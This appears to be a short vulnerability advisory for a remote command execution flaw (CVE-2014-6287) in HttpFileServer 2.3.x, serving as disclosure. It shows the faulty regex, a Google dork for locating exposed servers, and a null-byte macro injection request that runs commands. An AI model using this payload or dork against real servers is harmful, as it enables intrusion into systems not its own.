HttpFileServer 2.3.x Remote Command Execution

2014-10-15T00:00:00
ID SECURITYVULNS:DOC:31217
Type securityvulns
Reporter Securityvulns
Modified 2014-10-15T00:00:00

Description

Affected software: http://sourceforge.net/projects/hfs/ Version : 2.3x

Exploit Title: HttpFileServer 2.3.x Remote Command Execution

Google Dork: intext:"httpfileserver 2.3"

Date: 11-09-2014

Remote: Yes

Exploit Author: Daniele Linguaglossa

Vendor Homepage: http://rejetto.com/

Software Link: http://sourceforge.net/projects/hfs/

Version: 2.3.x

Tested on: Windows Server 2008 , Windows 8, Windows 7

CVE : CVE-2014-6287

issue exists due to a poor regex in the file ParserLib.pas

function findMacroMarker(s:string; ofs:integer=1):integer; begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;

it will not handle null byte so a request to

http://localhost:80/search=%00{.exec|cmd.}

will stop regex from parse macro , and macro will be executed and remote code injection happen.